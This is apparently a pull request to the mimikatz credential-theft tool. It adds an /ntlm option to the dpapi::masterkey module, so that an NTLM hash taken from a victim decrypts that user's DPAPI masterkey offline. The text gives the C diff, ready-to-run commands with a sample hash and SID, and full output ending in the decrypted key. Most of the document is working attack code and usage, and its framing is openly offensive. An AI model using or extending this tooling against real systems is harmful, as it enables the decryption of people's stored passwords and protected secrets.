### PR TITLE
Support decrypting DPAPI Masterkey with NTLM hash

### DIFF
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.c
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
@@ -144,6 +144,8 @@ NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[]) // no support for prot
 
 NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[])
 {
+	PCWCHAR szNTLM = NULL;
+	BYTE pNTLM[LM_NTLM_HASH_LENGTH];
 	PKULL_M_DPAPI_MASTERKEYS masterkeys;
 	PBYTE buffer, pHash = NULL, pSystem = NULL;
 	PVOID output, derivedKey;
@@ -190,6 +192,15 @@ NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[])
 
 				if(kull_m_string_args_byName(argc, argv, L"hash", &szHash, NULL))
 					kull_m_string_stringToHexBuffer(szHash, &pHash, &cbHash);
+				
+				if (kull_m_string_args_byName(argc, argv, L"ntlm", &szNTLM, NULL))
+				{
+					kull_m_string_stringToHex(szNTLM, pNTLM, LM_NTLM_HASH_LENGTH);
+					kull_m_dpapi_getProtected(pNTLM, sizeof(pNTLM), convertedSid);
+					pHash = pNTLM;
+					cbHash = LM_NTLM_HASH_LENGTH;
+				}
+				
 				if(kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL))
 					kull_m_string_stringToHexBuffer(szSystem, &pSystem, &cbSystem);
 


### PR DESCRIPTION
Added NTLM feature to the ```dpapi::masterkey``` module. Now is not necessary to previously calculate the hash. It is possible to add the ```/ntlm:HASH``` parameter directly and as a result is going to decrypt the masterkey.

Scenario description:

To decrypt masterkey outside the target computer, the following command has to be executed:

```dpapi::masterkey /in:"95f7be0a-11a5-442c-8da4-e8e8363e67f7" /hash:7836db5e0904989497a8dc5754a09c5b /sid:S-1-5-21-1968630676-249568448-1092335803-4158```

But this required to calculate the hash value first.

Now, if you obtain the NTLM hash of the victim, you can specify it directly in the ```dpapi::masterkey module```:

```
dpapi::masterkey /in:"95f7be0a-11a5-442c-8da4-e8e8363e67f7" /ntlm:77111de1f970bb77c5b4c3b475854722 /sid:S-1-5-21-1968630676-249568448-1092335803-4158
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {95f7be0a-11a5-442c-8da4-e8e8363e67f7}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : fb229db8bf5d6f13d3c4a6dfe0d50367
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : d8e2816265a74eeb1071c2531e40c6f12b248a3842bfbc3c331cf2e7518b3e256a31367e3252278e10ea904425080cd0fcb482e6110e1b3a161cbebf1212c64a2e547759e610833b7d28d96d4d9ad0ac37a07babc96aaa6714ba8e2f75c6612a3fc73f8dffd887ff

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : d425b604cbb85bfe37155e9eb73f2cef
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 88deefc1164d74993982c3c25fdfdd32d1d2e2c027c503b7364b92af26df13fd2d0a9af18e7f124c1b5d8c029641fd47b8416bc0bff33e9a66a9e7b6e5c6275d120693a9d39aa16c

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {116e39f3-e091-4b58-88ff-8f232466b5d6}
    pbSecret         : f66db46578d860660d5b88063bbd4122da4c528b33b94087e1a9dacf06289253626729e7079336e0ed46df37d1d871f0d92b76fb039790a6f410fc6b44498cf3fcb571c791ec864bd1286ef29137402f0d5f28978a8e0c2c4ff3d5097d4c9a8e922d80414173391ad072f48359d407c84b5bbaa10e8e96d638294d284043f6a15d9d1af8a5b4907cd34a73b5271e75a390a6cede19d6e6f57a051da01f7a0e128cce8043c7b548aa7fd4b93faa982baff3d8abf0b46dd20bd37071551ad3d1cdadb6d21ec2e3da63181a61be31cfb9b30009c889be44c97059b84393f66ef5101f3bc95dedff0e32acc0cb6f6bc4aaccd72543325e80769d560f4c537fce57aa
    pbAccesscheck    : e6a48866d16b51023906335118d882b8e26d83f9ca99570d9f260f687743de9742c2296bba9673951735dac0b0e4f42478e1fb4af9dd8f8156266c3f8d2e5b4ce722496bb5b169a3ce1249a3675e92b68fb7623197a18c35



[masterkey] with hash: 7836db5e0904989497a8dc5754a09c5b (ntlm type)
key : 0bea4d0123f88c40a88731c914594f9d3737c19eb10c78d2f23441657bf777ee6218c65f5268481c4377f81370f88ba4b9c440e7cec74a633d0277779640a45a

```

I hope this helps.

Thanks!

